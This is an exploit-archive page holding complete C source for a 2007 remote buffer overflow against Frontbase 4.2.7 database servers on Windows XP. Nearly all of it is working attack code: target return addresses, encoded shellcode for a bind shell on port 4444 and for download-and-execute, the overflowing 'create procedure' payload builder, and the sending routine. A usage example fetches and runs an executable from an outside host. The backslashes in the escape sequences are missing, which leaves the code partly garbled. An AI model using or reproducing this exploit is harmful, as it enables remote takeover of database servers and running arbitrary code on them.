[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Frontbase <= 4.2.7 POST-AUTH Remote Buffer Overflow Exploit v2.2
# Published : 2007-04-02
# Author : Heretic2
# Previous Title : Dart Communications PowerTCP Service Control Remote BoF Exploit
# Next Title : KSign KSignSWAT <= 2.0.3.3 ActiveX Control Remote BoF Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Frontbase <= 4.2.7 for Windows
* Site : http://www.frontbase.com
* Found by : Netragard, L.L.C Advisory
* ----------------------------------------
* Exploit : Frontbase <= 4.2.7 POST-AUTH remote buffer overflow
* Exploit date : 02.04.2007
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows XP SP0-SP2
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : This is the EIP overwrite realization of the Frontbase 'create procedure' buffer overflow.
* Exploit was tested on Frontbase 4.2.7 and 4.1.16 versions under Windows XP SP0, Windows XP SP1, Windows XP SP2.
* to add the Windows 2000 here , you will need to update a little stabstack code or use the SEH method exploit.
*
* this version of that exploit doesn't used the code from win32 SEH GetPC project to get the baseaddress
* cause this was not worked on the Windows XP, so i took it from stack and calculated baseaddress.
*
* also i added here the 'Download and Execute exploit'.
*
* Exploit requires authentification!
*
* ----------------------------------------
* Compiling:
* To compile this exploit you need:
* 1. Folder 'C:usrFrontBaseIncludeFBCAccess' copy to exploit folder.
* 2. Copy from 'C:usrFrontBaselib' file 'FBCAccess.lib' to your exploit folder.
* 3. Select 'FBCAccess.lib' in linker options
* 4. Compile.
* ----------------------------------------
* Thanks to:
* 1. Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
#include "FBCAccess/FBCAccess.h"
void usage(char * s);
void logo();
void prepare_shellcode(unsigned char * fsh, int sh, char * url);
void make_buffer(char * buf, int itarget, int sh, char * url);
int validate_args( int port, int sh, int itarget);
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf);
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct _target{
const char *t ;
unsigned long ret ;
} targets[] =
{ // alphanumeric jmp esp, for Windows XP i found it only in ole32.dll
{"Windows XP SP0 RUSSIAN [ ole32.dll ]", 0x77271f36 },
{"Windows XP SP1 RUSSIAN [ ole32.dll ]", 0x77270670 },
{"Windows XP SP2 RUSSIAN [ ole32.dll ]", 0x77544326 },
{"Windows XP SP2 DUTCH [ ole32.dll ]", 0x77514326 },
{NULL, 0x00000000 }
};
struct {
const char * name;
char * shellcode;
}shellcodes[]={
{"Spawn bindshell on port 4444",
/* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com
first jmp instructions removed, cause we already have the baseaddress in ECX */
"x49x49x49x49x49x49"
"x49x49x49x49x49x37x49x49x49x49x49x49x51x5ax6ax66"
"x58x30x42x31x50x41x42x6bx42x41x76x32x42x42x32x41"
"x41x30x41x41x42x58x50x38x42x42x75x38x69x39x6cx52"
"x4ax5ax4bx42x6dx68x68x48x79x4bx4fx6bx4fx4bx4fx65"
"x30x6cx4bx30x6cx31x34x71x34x4ex6bx42x65x65x6cx6e"
"x6bx53x4cx43x35x62x58x55x51x4ax4fx4ex6bx72x6fx54"
"x58x6cx4bx51x4fx77x50x53x31x78x6bx43x79x4ex6bx54"
"x74x6cx4bx35x51x6ax4ex64x71x6fx30x6ex79x6ex4cx6d"
"x54x6fx30x64x34x55x57x4fx31x59x5ax36x6dx36x61x59"
"x52x5ax4bx4cx34x37x4bx62x74x47x54x46x48x70x75x4d"
"x35x6cx4bx73x6fx64x64x33x31x4ax4bx43x56x4cx4bx44"
"x4cx62x6bx6ex6bx63x6fx57x6cx65x51x6ax4bx77x73x56"
"x4cx6cx4bx6ex69x62x4cx44x64x45x4cx55x31x6fx33x44"
"x71x6bx6bx51x74x4ex6bx53x73x30x30x4ex6bx57x30x34"
"x4cx6cx4bx64x30x37x6cx4ex4dx6cx4bx53x70x73x38x73"
"x6ex30x68x4cx4ex62x6ex74x4ex38x6cx30x50x79x6fx6a"
"x76x51x76x30x53x42x46x72x48x35x63x45x62x33x58x64"
"x37x64x33x74x72x43x6fx33x64x4bx4fx78x50x52x48x38"
"x4bx7ax4dx4bx4cx57x4bx62x70x69x6fx6ex36x71x4fx6e"
"x69x4bx55x33x56x6cx41x4ax4dx76x68x74x42x63x65x51"
"x7ax77x72x4bx4fx4ax70x63x58x6ex39x35x59x6bx45x4e"
"x4dx30x57x4bx4fx38x56x50x53x50x53x42x73x51x43x70"
"x53x70x43x32x73x52x63x76x33x59x6fx6ex30x55x36x33"
"x58x76x71x71x4cx63x56x56x33x6ex69x59x71x4ex75x55"
"x38x4cx64x55x4ax72x50x6bx77x56x37x4bx4fx4ex36x53"
"x5ax56x70x32x71x33x65x69x6fx4ex30x62x48x39x34x4c"
"x6dx74x6ex4ax49x63x67x69x6fx79x46x43x63x36x35x6b"
"x4fx68x50x35x38x5ax45x70x49x6dx56x70x49x41x47x6b"
"x4fx68x56x56x30x41x44x33x64x71x45x69x6fx4ex30x4d"
"x43x53x58x5ax47x70x79x6bx76x73x49x41x47x49x6fx4e"
"x36x63x65x4bx4fx4ex30x53x56x50x6ax35x34x53x56x41"
"x78x61x73x30x6dx4cx49x4bx55x72x4ax72x70x76x39x45"
"x79x58x4cx6bx39x59x77x31x7ax67x34x4cx49x49x72x70"
"x31x6fx30x6cx33x6fx5ax69x6ex72x62x36x4dx4bx4ex53"
"x72x34x6cx6ax33x6ex6dx62x5ax36x58x6cx6bx4cx6bx4e"
"x4bx61x78x30x72x6bx4ex6dx63x46x76x4bx4fx44x35x32"
"x64x39x6fx38x56x51x4bx70x57x52x72x70x51x32x71x53"
"x61x42x4ax43x31x56x31x46x31x70x55x43x61x79x6fx6a"
"x70x62x48x6ex4dx59x49x67x75x7ax6ex33x63x39x6fx59"
"x46x63x5ax59x6fx4bx4fx76x57x6bx4fx6ax70x4cx4bx61"
"x47x59x6cx6bx33x38x44x43x54x49x6fx58x56x36x32x59"
"x6fx4ex30x43x58x68x70x4fx7ax54x44x73x6fx71x43x4b"
"x4fx4ex36x6bx4fx78x50x66"
},
{ "Download and execute shellcode (set URL)",
/* win32_download_exec - http://metasploit.com */
/* encoded by "ALPHA 2: Zero-tolerance. <skylined@edup.tudelft.nl> */
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51"
"x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4Ax49x58x6Bx36x70x71x4Ax33x7Ax76x53x59x59x71"
"x76x38x39x57x4Cx35x51x6Bx30x74x74x74x4Ax6Ex79x39"
"x72x7Ax5Ax78x6Bx36x65x4Dx38x7Ax4Bx4Bx4Fx4Bx4Fx4B"
"x4Fx54x30x50x4Cx4Ex79x6Cx59x5Ax39x4Fx33x79x6Dx55"
"x68x6Cx69x5Ax39x4Ex79x4Ax39x34x52x58x59x6Ex75x54"
"x52x4Bx59x6Dx55x36x54x45x42x7Ax79x6Fx61x56x72x53"
"x71x34x52x5Ax4Ax6Dx75x76x72x4Ax4Dx4Ex67x4Dx31x6F"
"x6Ax72x4Ax36x72x6Bx57x4Ex59x4Fx6Ax33x52x76x72x6E"
"x37x4Cx4Dx6Fx5Ax74x34x7Ax6Fx48x4Ex79x58x55x42x4D"
"x76x4Cx5Ax73x52x74x52x32x4Bx6Bx43x4Cx57x49x50x52"
"x4Ax75x6Fx7Ax4Dx4Ax31x69x50x59x56x54x5Ax51x4Ex4F"
"x6Dx69x4Cx33x4Bx64x30x4Bx70x6Fx36x6Bx77x54x52x73"
"x64x62x32x79x4Fx4Dx6Dx6Ex7Ax70x5Ax73x78x70x78x4F"
"x6Ax62x78x6Dx7Ax50x50x4Bx4Fx75x42x4Ax31x75x42x4B"
"x6Fx6Fx75x4Dx4Ax61x4Ax52x78x52x58x4Dx4Bx6Ex7Ax50"
"x58x66x72x4Dx49x6Dx4Ax51x4Ax56x72x55x33x62x32x50"
"x6Ex55x4Ax51x4Fx4Ex77x75x42x63x79x49x63x4Dx4Dx39"
"x50x32x51x4Bx79x4Dx49x6Dx49x6Ex79x76x7Ax51x4Fx4C"
"x54x68x4Bx78x4Fx71x76x6Ax6Ex55x35x59x53x77x62x53"
"x71x4Bx43x4Ex78x39x50x31x61x59x34x4Dx49x4Cx59x6E"
"x79x46x7Ax71x4Fx6Fx7Ax6Ax6Fx69x4Fx74x59x4Dx77x77"
"x69x78x6Cx73x53x37x69x6Ex4Fx37x69x7Ax67x75x4Ax73"
"x45x6Ex59x75x42x71x55x6Bx43x78x39x4Bx7Ax45x36x68"
"x4Ex73x45x31x4Ex6Dx4Dx4Fx6Ax39x55x79x68x6Ex57x4B"
"x4Cx51x4Ex6Bx6Dx4Fx6Ax4Dx4Dx38x61x79x6Cx6Cx59x6A"
"x39x4Fx5Ax70x59x4Bx79x79x59x6Ax6Ax4Ax6Fx39x59x73"
"x56x48x4Ex53x55x55x42x71x55x6Bx79x6Ax6Ax50x66x48"
"x4Ex65x39x6Ax69x65x36x78x4Ex50x6Dx6Fx5Ax52x79x30"
"x35x35x4Cx50x59x4Ax4Cx31x70x58x48x78x4Bx78x4Fx6A"
"x6Ax52x46x50x4Bx68x43x6Bx70x74x72x73x4Bx70x77x4F"
"x5Ax56x39x73x6Ax61x61x4Dx6Fx63x56x43x56x75x36x4B"
"x6Ex79x6Cx7Ax4Dx6Fx39x78x6Bx58x76x6Bx4Ax78x58x4B"
"x4Dx6Bx4Dx5Ax4Bx4Bx4Cx4Ax4Ax7Ax4Ax5Ax39x59x4Ex6B"
"x4Cx48x6Dx5Ax6Ax6Bx50x4Bx5Ax5Ax4Dx4Bx4Cx4Bx44x6B"
"x6Dx6Cx30x4Ax4Bx6Bx4Cx79x6Ax58x6Dx59x66x5Ax4Bx59"
"x70x68x58x4Dx49x7Ax6Ex6Ax50x4Cx37x4Bx6Cx6Dx31x6B"
"x4Cx6Bx4Ax6Cx59x4Bx6Cx6Bx51x5Ax50x48x6Dx4Ax6Dx68"
"x71x4Ax4Bx79x6Cx59x68x6Bx4Dx4Fx69x6Ex35x4Bx46x6B"
"x48x4Bx4Dx4Ex35x78x70x6Bx4Bx4Ax4Bx7Ax58x48x6Bx4B"
"x50x4Ax78x4Cx59x4Ax4Cx4Ax4Bx6Ax55x59x64x4Cx36x6B"
"x47x4Ex79x68x4Cx38x4Bx7Ax75x4Bx6Dx79x66x7Ax4Ex4B"
"x47x39x65x4Ax56x58x78x4Bx4Dx7Ax6Dx4Cx36x59x4Fx78"
"x70x7Ax55x39x6Cx6Ex38x6Dx49"
},
{NULL , NULL }
};
// alphanumeric stack stabilizer
char stabstack[]= "x01x01x01x01x54x54x5bx58x66x2dx30x30x50x5cx53x58x04x20x50x59";
int main(int argc, char **argv)
{
char temp1[100], temp2[100];
char *url= NULL, * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL;
char default_remotehost[]="127.0.0.1";
char default_user[]="_SYSTEM";
char default_password[]="";
char default_database[]="";
char default_dbpassword[]="";
int port, itarget, sh;
char c;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=-1;
itarget=0;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:x:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
case 'u':
user=optarg;
break;
case 'P':
password=optarg;
break;
case 'd':
database=optarg;
break;
case 'x':
url=optarg;
break;
default:
usage(argv[0]);
return -1;
}
}
if(validate_args( port, sh, itarget)==-1) return -1;
if(remotehost == NULL) remotehost=default_remotehost;
if(user == NULL) user=default_user;
if(password == NULL) password=default_password;
if(dbpassword == NULL) dbpassword=default_dbpassword;
if(database == NULL) database=default_database;
if(url == NULL) url="";
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, 'x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# n", remotehost, temp1);
if(port!=-1)
{
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# n", temp2, temp1);
}else
{
sprintf(temp2, "%s", database);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Database: %s%s# n", temp2, temp1);
}
sprintf(temp2, "%s", user);
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # User : %s%s# n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # Shellcde: %s%s# n", temp2, temp1);
if(sh==1)
{
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", url );
memset(temp1, 'x20' , 58 - strlen(temp2) -1);
printf(" # URL : %s%s# n", temp2, temp1);
}
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# n", targets[itarget].t, temp1);
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
char buf[20000];
memset(buf,0,sizeof(buf));
printf("[+] Constructing attacking buffer... ");
fflush(stdout);
make_buffer((char *)buf,itarget,sh, url);
printf("donen");
if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1)
{
fprintf(stdout, "[-] Cannot exploit server %sn", remotehost);
return -1;
}
return 0;
}
int validate_args(int port, int sh, int itarget)
{
int i=0,x=0;
for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
if(x==0)
{
printf("[-] The shellcode number is invalidn");
return -1;
}
x=0;
for(i=0;targets[i].t;i++)if(i==itarget)x=1;
if(x==0)
{
printf("[-] The target is invalidn");
return -1;
}
return 1;
}
void prepare_shellcode( char * fsh, int sh, char * url)
{
memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));
if(sh==1)
{
char locurl[1000];
memcpy(locurl, url, strlen(url));
locurl[strlen(locurl)]='x80';
char encoded_url[2500] ;
alphanumeric_encoder_thx_to_skylined(locurl, encoded_url);
strcat(fsh, encoded_url);
}
}
void make_buffer(char * buf, int itarget, int sh, char * url)
{
// -=[ prepare shellcode ]=-
char fsh[1000];
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, sh, url);
// -----------------
// -=[ fill buffer here ]=-
memset(buf,0,sizeof(buf));
char * cp = buf;
// make vulnerable sql92 command to get exploit
strcat(buf, "create procedure "");
cp=buf+strlen(buf);
// long buffer
memset(cp, 'A', 255);
cp+=strlen((char *)cp);
// overwrite EIP
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// some chars
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
// put stack stabilizer
memcpy(cp, stabstack, strlen(stabstack));
cp+=strlen((char *)cp);
// put shellcode
memcpy(cp, fsh, strlen(fsh));
cp+=strlen((char *)cp);
// :P
memset(cp, 'A', 10);
cp+=strlen((char *)cp);
// end of the sql92 command
memcpy(cp, ""()n beginn end;", strlen(""()n beginn end;"));
// -----------------
}
int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf)
{
FBCDatabaseConnection * fbdc;
FBCMetaData *meta;
char sesn[]="dreatica-fxp";
if(database!=NULL) port = -1;
fbcInitialize();
if (port!=-1)
{
printf("[+] Connecting to %s:%dn", host, port);
fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword);
}else
{
printf("[+] Connecting to %s to database %sn", host, database);
fbdc = fbcdcConnectToDatabase(database, host, dbpassword);
}
if (fbdc == NULL)
{
printf("[-] Cannot connect to %sn", host);
return -1;
}
char * session_name=sesn;
meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user");
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to create sessionn");
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
printf("[+] Sending %d bytes of buffer to server, check the shelln", strlen(buf));
// if exploit success, the app will stop here.
meta = fbcdcExecuteDirectSQL(fbdc, buf);
if (fbcmdErrorsFound(meta) != 0)
{
printf("[-] Failed to send buffern");
FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta);
char* msgs = fbcemdAllErrorMessages(emd);
fbcemdRelease(emd);
free(msgs);
fbcmdRelease(meta);
fbcdcClose(fbdc);
fbcdcRelease(fbdc);
return -1;
}
fbcmdRelease(meta);
return 1;
}
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded )
{
int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
char temp[10];
memset(temp, 0 , sizeof(temp));
memset(encoded,0x00,1000);
srand((int)clock());
while( (input = to_encode[ii++]) != 0 ) {
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
E = valid_chars[i] >> 4;
D = (A^E);
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
C = valid_chars[i] >> 4;
sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
encoded[strlen(encoded)]=temp[0];
encoded[strlen(encoded)]=temp[1];
}
encoded[strlen(encoded)]='A';
return 0;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf(" Usage: %s -h <host> -p <port> -s <shellcode> -t <target> -u <user> -p <password> -d <database> -D <dbpassword> -x <url>n", s);
printf(" ----------------------------------------------------------------------- n");
printf(" Arguments:n");
printf("n");
printf(" -h <host> the host IP to attackn");
printf(" -p <port> the port of server (default: -1 )n");
printf(" -s <shellcode> shellcode number (default: 1 )n");
printf(" -t <target> target number (default: 1 )n");
printf(" -u <user> user name of frontbase (default: _SYSTEM)n");
printf(" -p <password> user password (default: <blank>)n");
printf(" -d <database> database (if port = -1) (default: <blank>)n");
printf(" -D <dbpassword> database password (default: <blank>)n");
printf(" -x <url> URL to executable (default: <blank>)n");
printf("n");
printf(" Shellcodes:nn");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %s n",i+1,shellcodes[i].name);
}
printf("n");
printf(" Targets:nn");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1,targets[j].t);
}
printf("n");
printf(" Examples:nn");
printf(" %s -h 127.0.0.1 -d Newn", s);
printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1n", s);
printf(" %s -h 127.0.0.1 -d New -t 5 -s 2 -x http://dreatica.com/calc.exen", s);
printf(" ----------------------------------------------------------------------- n");
}
void logo()
{
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : Frontbase <= 4.2.7 for Windows (multiple targets) # n");
printf(" # Tested : Frontbase 4.1.16 and 4.2.7 # n");
printf(" # Author : Heretic2 (heretic2x@gmail.com) # n");
printf(" # Version : 2.2 # n");
printf(" # System : Windows XP SP0-SP2 # n");
printf(" # Date : 02.04.2007 # n");
printf(" # ------------------------------------------------------------------- # n");
}
// www.Syue.com [2007-04-02]